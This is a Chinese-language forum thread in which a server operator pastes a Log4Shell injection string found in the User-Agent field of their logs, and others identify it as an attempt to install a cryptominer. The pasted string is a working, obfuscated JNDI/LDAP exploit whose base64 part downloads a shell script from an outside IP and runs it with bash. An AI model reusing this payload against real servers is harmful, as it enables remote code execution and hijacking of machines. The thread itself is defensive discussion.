V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member Sign In
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
This topic created in 1539 days ago, the information mentioned may be changed or developed.
年前部署一个接口服务,通过日志,最近发现经常有 User-Agent 异常注入的访问 其中一个比较诡异的内容:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//150.136.111.68:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L2ludGVsLnNoOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvaW50ZWwuc2g7IGJhc2ggaW50ZWwuc2ggNDY4cllRTXhuQ3YzWG9GclhmNWkyUWU5eVpyelZTZGdNV2hqaVAyNjRUQWdKNXc0WGU2UGlKdGFGRjc5amhlNWFIaG1rdVNGOEttc0xkczRyN0hNRHhDelJLbU1UN3o=}')
知道这是干嘛的吗
11 replies • 2022-02-17 09:33:19 +08:00
 |
1
ThirdFlame Feb 10, 2022
log4shell
|
 |
3
zhazi Feb 10, 2022
|
 |
4
maichaide Feb 10, 2022
下载脚本开启探矿服务
|
 |
5
muzuiget Feb 10, 2022
Log4j 漏洞,就是赌你用 Log4j 把 UserAgent 记录到日志中,实现远程执行代码。
|
 |
6
yundun2021 Feb 10, 2022
有条件可以上 WAF
|
 |
7
yu1u Feb 10, 2022
log4j 漏洞攻击
|
 |
8
0x73346b757234 Feb 10, 2022
对面想通过 Log4j 漏洞下载 xmrig 挖矿脚本。多谢老哥提供了个样本,测了下自己的规则能覆盖,嘿嘿。
|
 |
11
kaka6 OP 又收到不少的 User-Agent:
Go-http-client/1.1 python-requests/2.20.1 curl/7.75.0 而且还来自世界各地,以前没做这么细的记录,现在全网做记录,发现了不少莫明访客 |
Select Language